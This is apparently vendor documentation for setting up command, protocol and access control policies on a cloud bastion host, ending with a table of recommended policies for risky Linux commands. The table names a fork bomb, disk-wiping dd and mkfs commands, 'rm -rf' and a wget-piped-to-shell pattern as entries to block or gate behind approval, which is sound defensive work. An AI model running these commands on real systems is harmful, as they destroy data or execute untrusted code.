Bastionhost supports control policies. You can configure command control, command approval, protocol control, and access control policies to control O&M operations. This prevents users from running high-risk commands or performing accidental operations, which ensures O&M security.
Step 1: Create a control policy
Log on to the console of a bastion host. For more information, see Log on to the console of a bastion host.
In the left-side navigation pane, click Control Policies.
On the Control Policies page, click Create Control Policy.
On the Create Control Policy page, configure the Name, Priority, Command Control, Command Approval, Protocol Control, Access Control, and O&M Approval parameters. Then, click Create Control Policy.
Parameter
Description
Name
Specify the name for the control policy. The name must meet the following requirements:
The name must be 1 to 128 characters in length.
The name cannot start with a special character.
The name can contain the following special characters: periods (.), underscores (_), hyphens (-), backslashes (\), and spaces.
Priority
Specify the priority of the control policy.
Valid values: 1 to 100. Default value: 1. The default value specifies the highest priority.
You can configure the same priority for different control policies. If multiple control policies have the same priority, the policy that is created at the most recent point in time takes precedence. If the same command is involved in both the command control and command approval rules in a control policy, the rules are prioritized in descending order: reject, allow, and approve.
Command Control
NoteThis parameter applies to only Linux hosts.
Specify the commands that can or cannot be run by the users or on the assets to which the policy applies.
Command Control Type
(Blacklist) Listed Commands Are Not Allowed: If you select this option, you can leave the Commands field empty. The commands in a blacklist cannot be run by the users or on the assets to which the policy applies.
(Whitelist) Only Listed Commands Are Allowed: If you select this option, you must configure the Commands field. Only the commands in a whitelist can be run by the users and on the assets to which the policy applies.
Commands: For more information, see Recommended policies for commands.
Command Approval
NoteThis parameter applies to only Linux hosts.
Specify the commands that can be run only after approval.
If users run the commands that are specified by the Commands field in the Command Approval step, you can choose whether to approve the execution of the commands in the console of the bastion host. Only the commands that are approved can be run. For more information, see Review commands.
A command approval policy is used to approve the commands that are not included in the whitelist or blacklist of a command control policy. The command control policy takes precedence over the command approval policy during validation.
Protocol Control
Configure the RDP Options, SSH Options, and SFTP Options fields.
After you select required options, the users to which the policy applies can perform the operations based on the selected options. For example, if you select File Upload, the users can upload files.
ImportantYou must select at least one of the SSH Channel and SFTP Channel options. If you clear SSH Channel, SSH-based logon is disabled for accounts. Proceed with caution.
If you enable Enable Only SFTP Permission for a host account, do not disable SSH and SFTP channels for the host account in a control policy. Otherwise, the host account cannot be used to access the host by using the bastion host.
Access Control
Specify whether a source IP address can access the assets to which the policy applies.
(Whitelist) Only Listed IP Addresses Are Allowed: If you select this option, you must configure the IP Addresses field. Users can use only the source IP addresses in a whitelist to access the assets to which the policy applies.
(Blacklist) Listed IP Addresses Are Not Allowed: If you select this option, you can leave the IP Addresses field empty. Users cannot use the source IP addresses in a blacklist to access the assets to which the policy applies.
O&M Approval
After O&M Approval is enabled, an O&M engineer can log on to the required assets and perform O&M operations only after a Bastionhost administrator approves the O&M application. For more information, see Review an O&M application.
Step 2: Associate the control policy with assets and users
On the Assets and Users to Which Policy Is Attached page, you must associate the control policy with assets and users for the policy to take effect on the assets and users.
Associate the control policy with assets. You can select Takes Effect on All Assets or Takes Effect on Selected All Assets.
If you select Takes Effect on All Assets, the control policy takes effect on all accounts of assets.
If you select Takes Effect on Selected All Assets, after you select assets that you want to associate, you can select Associate All Accounts or Associate Specific Accounts.
NoteIf you want to associate a control policy with multiple assets or asset accounts at a time, you can add the assets to an asset group at a time and then associate the control policy.
Associate the control policy with users. You can select Apply to All Users or Apply to Selected Users.
Recommended policies for commands
The following table describes some commands, and descriptions and recommended policies for the commands. You can configure the parameters in the Command Control (Optional) and Command Approval (Optional) steps based on the following table.
Command | Description | Recommendation policy |
reboot | Restarts the system. | This command must be approved before it can be run. |
restart | Restarts the system. | This command must be approved before it can be run. |
shutdown | Shuts down the system. | This command must be approved before it can be run. |
halt | Shuts down the system. | This command must be approved before it can be run. |
poweroff | Shuts down the system. | This command must be approved before it can be run. |
init 0 | Stops the system. | This command must be approved before it can be run. |
pkill | Terminates multiple processes at a time. | This command must be approved before it can be run. |
kill | Terminates a single process. | This command must be approved before it can be run. |
rm -rf | Recursively deletes directories and ignores prompts. | This command must be approved before it can be run. |
mount | Mounts a file system. This may cause virus replication risks. | This command must be approved before it can be run. |
umount | Unmounts a file system. | This command must be approved before it can be run. |
parted | Partitions a file system. | This command must be approved before it can be run. |
format | Formats the disk. | This command must be added to a blacklist. |
dd if=/dev/zero of=/dev/had | Clears the disk. | This command must be added to a blacklist. |
:(){:|:&};: | Creates a fork bomb. | This command must be added to a blacklist. |
(mv)(|.*)(/dev/null) | Moves a directory to the /dev/null file. | This command must be added to a blacklist. |
(wget)(|.*)(-O- \| sh) | Downloads a file and immediately executes the file. | This command must be added to a blacklist. |
mkfs.ext3 * | Formats the disk. | This command must be added to a blacklist. |
dd if=/dev/random of=/dev/* | Writes data to a block device in a random manner. | This command must be added to a blacklist. |